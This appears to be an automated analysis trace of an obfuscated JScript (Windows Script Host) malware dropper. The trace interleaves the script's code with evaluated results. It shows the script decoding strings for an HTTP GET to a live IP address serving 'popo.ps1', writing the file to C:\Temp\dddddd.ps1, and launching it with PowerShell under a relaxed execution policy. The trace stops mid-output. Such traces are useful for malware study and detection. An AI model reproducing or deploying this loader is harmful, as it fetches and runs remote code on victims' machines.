                                                                              • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
                                                                              • _0x3d8f() ➔ W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG
                                                                              • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                              return _0x1bc8c2;
                                                                                };
                                                                                  return _0x3d8f ( );
                                                                                  • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                  }
                                                                                    ( function (_0x47f2ce, _0x45b0b8) {
                                                                                    • (function _0x3d8f(),918695) ➔ undefined
                                                                                    • (function _0x3d8f(),918695) ➔ undefined
                                                                                    var _0x41ea74 = _0x2aa5, _0x34690f = _0xe32f, _0x5bad84 = _0x5598, _0x5eaacf = _0x47f2ce ( );
                                                                                    • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                    while (! ! [ ] )
                                                                                      {
                                                                                        try
                                                                                          {
                                                                                            var _0x2ad534 = parseInt ( _0x5bad84 ( 0x116, 'E3DQ' ) ) / 0x1 * ( parseInt ( _0x5bad84 ( 0x130, '[aOH' ) ) / 0x2 ) + parseInt ( _0x5bad84 ( 0x12f, 'ClmG' ) ) / 0x3 * ( parseInt ( _0x34690f ( 0x136 ) ) / 0x4 ) + - parseInt ( _0x41ea74 ( 0x115 ) ) / 0x5 + parseInt ( _0x5bad84 ( 0x129, 'GEGf' ) ) / 0x6 + - parseInt ( _0x41ea74 ( 0x123 ) ) / 0x7 + - parseInt ( _0x41ea74 ( 0x132 ) ) / 0x8 * ( - parseInt ( _0x5bad84 ( 0x128, 'h#TZ' ) ) / 0x9 ) + parseInt ( _0x41ea74 ( 0x122 ) ) / 0xa * ( parseInt ( _0x41ea74 ( 0x11e ) ) / 0xb );
                                                                                            • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                            • parseInt("\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                            • parseInt("PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                            • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                            • parseInt("\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5") ➔ NaN
                                                                                            • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                            • parseInt("\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\xac\xf9\x1a\xbd\xf5'h\xa2\x97\xf2tB"
                                                                                            • parseInt("\xac\xf9\x1a\xbd\xf5'h\xa2\x97\xf2tB") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
                                                                                            • parseInt("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ NaN
                                                                                            • _0x2aa5(277) ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "\xd5\x83U\x8bq\xf5L\x0f\x91\xc0!\xc9"
                                                                                            • parseInt("\xd5\x83U\x8bq\xf5L\x0f\x91\xc0!\xc9") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "\xad_\xb6\xe2"
                                                                                            • parseInt("\xad_\xb6\xe2") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ undefined
                                                                                            • _0x5bad84(278,"E3DQ") ➔ "/\x0ed\x18\x8fA\xcaV\xfc6\xab\x15\"
                                                                                            • parseInt("/\x0ed\x18\x8fA\xcaV\xfc6\xab\x15\") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xb7\xf0]\xe7\x97\xd6\x93r9\xbc\xd7\xbay\xd6\xe1\xd3\xde\xc0&HU\xc4\x00\xee\x02\xbc\xd2\x07\xb06v\xd1E\x0f\x0e \xe9QY"
                                                                                            • parseInt("\xb7\xf0]\xe7\x97\xd6\x93r9\xbc\xd7\xbay\xd6\xe1\xd3\xde\xc0&HU\xc4\x00\xee\x02\xbc\xd2\x07\xb06v\xd1E\x0f\x0e \xe9QY") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ undefined
                                                                                            • parseInt("\xb4\x86=\xc1\xa4\xd8\xdc\x83t\x13o(\xa8\xb9\x9f\xfb\xff\xdd\xcc\x8b7\xde=\x81\xf4h") ➔ NaN
                                                                                            • _0x5bad84(304,"[aOH") ➔ "\xb1\xfaQ\xf2\x8a\xdd\xbb0 \xba\xc6\xa7"
                                                                                            • parseInt("\xb1\xfaQ\xf2\x8a\xdd\xbb0 \xba\xc6\xa7") ➔ NaN
                                                                                            • _0x5bad84(303,"ClmG") ➔ "\xda\xb6B\xf8\xa5yl\xd0\x81\xfej~\xfcK\xc8 et\x0e\xe8\xaf\xd1u\xa1\x95K rB\xcdzy\x98b\xb3v-\x9f\xc9"
                                                                                            • parseInt("\xda\xb6B\xf8\xa5yl\xd0\x81\xfej~\xfcK\xc8 et\x0e\xe8\xaf\xd1u\xa1\x95K rB\xcdzy\x98b\xb3v-\x9f\xc9") ➔ NaN
                                                                                            • _0xe32f(310) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
                                                                                            • parseInt("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ NaN
                                                                                            • _0x2aa5(277) ➔ "9716744ntollE"
                                                                                            • parseInt("9716744ntollE") ➔ 9716744
  • _0x5bad84(297,"GEGf") ➔ "o\xe8\xc7 \xe5v\xa4\xe3<\x1dt\xb7E\xd4\x1e\xb2j\xaeVZ\xc6[\xd3\xb8jg"
  • parseInt("o\xe8\xc7 \xe5v\xa4\xe3<\x1dt\xb7E\xd4\x1e\xb2j\xaeVZ\xc6[\xd3\xb8jg") ➔ NaN
  • _0x2aa5(291) ➔ undefined
  • parseInt("\xc7$"\xe9") ➔ NaN
  • _0x5bad84(304,"[aOH") ➔ "\xf6\x88Lw-[\xb2"
  • parseInt("\xf6\x88Lw-[\xb2") ➔ NaN
  • _0x5bad84(303,"ClmG") ➔ "\xdc\xbcN\xed\xb8rD\x92\x98\xf8{c"
  • parseInt("\xdc\xbcN\xed\xb8rD\x92\x98\xf8{c") ➔ NaN
  • _0xe32f(310) ➔ "124678FeSFCc"
  • parseInt("124678FeSFCc") ➔ 124678
  • _0x2aa5(277) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
  • parseInt("\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X") ➔ NaN
  • _0x5bad84(297,"GEGf") ➔ undefined
  • parseInt("\xd3\x1b\x9c\xe2\xed\x11q$~q") ➔ NaN
  • _0x5bad84(304,"[aOH") ➔ "0\xab\xf9Q\xfe\x84&i\x87\xd7.~\x07"
  • parseInt("0\xab\xf9Q\xfe\x84&i\x87\xd7.~\x07") ➔ 0
  • _0x5bad84(303,"ClmG") ➔ "\x9b\xceSh\x1f\xf4M"
  • parseInt("\x9b\xceSh\x1f\xf4M") ➔ NaN
  • _0xe32f(310) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
  • parseInt("WQ7dVXVcVCkpCLJcM8keW6W") ➔ NaN
  • _0x2aa5(277) ➔ "\xd1\x1dw\xc7"
  • parseInt("\xd1\x1dw\xc7") ➔ NaN
  • _0x5bad84(297,"GEGf") ➔ "\xc3-\xcb\xcb =\x81?\xdb\x13\x84\xad"
  • parseInt("\xc3-\xcb\xcb =\x81?\xdb\x13\x84\xad") ➔ NaN
  • _0x2aa5(291) ➔ "\xa1\xedZ\xf7"
  • parseInt("\xa1\xedZ\xf7") ➔ NaN
  • _0x2aa5(306) ➔ undefined
  • parseInt("PV9J\xdd\x07\xbb@\xe1*\xb3 ") ➔ NaN
  • _0x5bad84(304,"[aOH") ➔ "\xb4\xe9]\xff\x9b\xdc\xd4&%\xff\xc0\xabl\xc1\xb4\xc3\xce\x85VSM\x81\x16\xd2\x1d\xb7\xd2\x04\xf1!5\xc5M\x16\x16F\xbb"
  • parseInt("\xb4\xe9]\xff\x9b\xdc\xd4&%\xff\xc0\xabl\xc1\xb4\xc3\xce\x85VSM\x81\x16\xd2\x1d\xb7\xd2\x04\xf1!5\xc5M\x16\x16F\xbb") ➔ NaN
  • _0x5bad84(303,"ClmG") ➔ undefined
  • parseInt("\w/.q\xca\xac\xc9\xce3") ➔ NaN
  • _0x5bad84(303,"ClmG") ➔ undefined
  • parseInt("124678FeSFCc") ➔ 124678
  • _0x5bad84(303,"ClmG") ➔ "1101CeSkvq"
  • parseInt("1101CeSkvq") ➔ 1101
  • _0xe32f(310) ➔ "5836fimqHT"
  • parseInt("5836fimqHT") ➔ 5836
  • _0x2aa5(277) ➔ "5141585tSDBkb"
  • parseInt("5141585tSDBkb") ➔ 5141585
  • _0x5bad84(297,"GEGf") ➔ "2978310VstcUa"
  • parseInt("2978310VstcUa") ➔ 2978310
  • _0x2aa5(291) ➔ "12642224tnuDGo"
  • parseInt("12642224tnuDGo") ➔ 12642224
  • _0x2aa5(306) ➔ "9716744ntollE"
  • parseInt("9716744ntollE") ➔ 9716744
  • _0x5bad84(296,"h#TZ") ➔ "9MuWyMs"
  • parseInt("9MuWyMs") ➔ 9
  • _0x41ea74(290) ➔ "371190cReolU"
  • parseInt("371190cReolU") ➔ 371190
  • _0x41ea74(286) ➔ "77WhCiSA"
  • parseInt("77WhCiSA") ➔ 77
if ( _0x2ad534 === _0x45b0b8 )
break ;
else
_0x5eaacf['push'] ( _0x5eaacf['shift'] ( ) );
}
catch ( _0x417609 )
{
_0x5eaacf['push'] ( _0x5eaacf['shift'] ( ) );
}
}
} ( _0x3d8f, 0xe04a7 ) );
var URL = 'http://196.251.92.64/crypt/popo.ps1', DownloadPath = _0x429836 ( 0x121 ), TEMP_DIR = 'C:\x5cTemp', SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = _0x429836 ( 0x112 ), shell = WScript[_0x165511 ( 0x127 ) ] ( 'WScript.Shell' ), fileSystem = WScript['CreateObject'] ( _0x36bb1e ( 0x133, ')$c]' ) ), http = WScript['CreateObject'] ( _0x429836 ( 0x124 ) );
  • _0xe32f(289) ➔ "C:\Temp\dddddd.ps1"
  • _0xe32f(274) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
  • _0x165511(295) ➔ "CreateObject"
  • Windows Script Host.CreateObject("WScript.Shell") ➔
  • _0x36bb1e(307,")$c]") ➔ "Scripting.FileSystemObject"
  • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
  • _0xe32f(292) ➔ "MSXML2.XMLHTTP"
  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
! fileSystem[_0x165511 ( 0x113 ) ] ( TEMP_DIR ) && fileSystem[_0x429836 ( 0x11f ) ] ( TEMP_DIR );
  • _0x165511(275) ➔ "FolderExists"
  • FolderExists("C:\Temp") ➔ false
  • _0xe32f(287) ➔ "CreateFolder"
  • CreateFolder("C:\Temp") ➔ C:\Temp
function _0xe32f(_0x52b743, _0xdbcf57) {
  • _0xe32f(310) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
  • _0xe32f(310) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
  • _0xe32f(310) ➔ "124678FeSFCc"
  • _0xe32f(310) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
  • _0xe32f(310) ➔ "5836fimqHT"
  • _0xe32f(289) ➔ "C:\Temp\dddddd.ps1"
  • _0xe32f(274) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
  • _0xe32f(292) ➔ "MSXML2.XMLHTTP"
  • _0xe32f(287) ➔ "CreateFolder"
  • _0xe32f(282) ➔ "GET"
var _0x3d8f07 = _0x3d8f ( );
  • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
  • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
  • _0x3d8f() ➔ WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc
  • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: 